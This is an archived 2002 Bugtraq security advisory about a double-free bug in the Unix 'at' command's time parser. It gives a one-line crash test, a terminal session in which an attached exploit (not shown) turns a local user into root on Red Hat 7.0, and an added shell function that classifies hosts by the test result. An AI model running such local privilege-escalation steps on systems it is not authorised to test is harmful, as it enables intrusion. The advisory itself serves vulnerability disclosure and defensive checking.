The OpenNET Project / Index page

'/usr/bin/at 31337 + vuln' problem + exploit


Date: Thu, 17 Jan 2002 13:19:08 +1300 (NZDT)
From: zen-parse <zen-parse@gmx.net>
To: bugtraq@securityfocus.com
Subject: '/usr/bin/at 31337 + vuln' problem + exploit


Affects: /usr/bin/at 

To check if you are potentially vulnerable to this exploit, execute:
  /usr/bin/at 31337 + vuln

If you are vulnerable this will cause:
Segmentation fault 

If not, there will be a message similar to: 
Garbled time
(possibly with some extra information)

The problem is caused by a bug in the parser which deallocates the same 
memory location twice.

This can sometimes be exploited, for the uid of "daemon",  and due to some 
other minor problems, may allow root access from there.

Attached is an exploit for Redhat 7.0.

bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3 
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$ 

-- zen-parse

-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.



[Attachment: attn.tar.gz (APPLICATION/X-GZIP, base64), "Local root exploit (rh 7.0)"]
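
The check from the message above, wrapped so the outcome can be classified across many hosts. This is an added example, not part of the original post; the function name `check_at`, the verdict strings and the SIGABRT case (how a current glibc reports a detected double free) are assumptions beyond what the post states.

```shell
#!/bin/sh
# check_at [AT_COMMAND]: run the advisory's test input and print a verdict.
# Return codes: 0 = input rejected ("Garbled time"), 1 = crashed
# (potentially vulnerable), 2 = inconclusive, 3 = at not installed.
check_at() {
    at_bin="${1:-/usr/bin/at}"
    command -v "$at_bin" >/dev/null 2>&1 || { echo "not-installed"; return 3; }

    # Same arguments as in the advisory. stdin is /dev/null so that at
    # cannot sit waiting for job text if it ever accepted the time spec.
    status=0
    out=$("$at_bin" 31337 + vuln 2>&1 </dev/null) || status=$?

    # The shell reports death by signal as 128 + signal number:
    # SIGSEGV (11) -> 139 is the "Segmentation fault" from the advisory;
    # SIGABRT (6) -> 134 is an assumption covering glibc's double-free abort.
    case "$status" in
        139|134) echo "crashed"; return 1 ;;
    esac

    # The non-vulnerable case from the advisory: the parser rejects the input.
    case "$out" in
        *"Garbled time"*) echo "rejected"; return 0 ;;
    esac

    echo "inconclusive"; return 2
}
```

A "crashed" verdict only means the parser fault was reached; use the package version (`rpm -qf /usr/bin/at`, as in the session above) to confirm what is installed.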
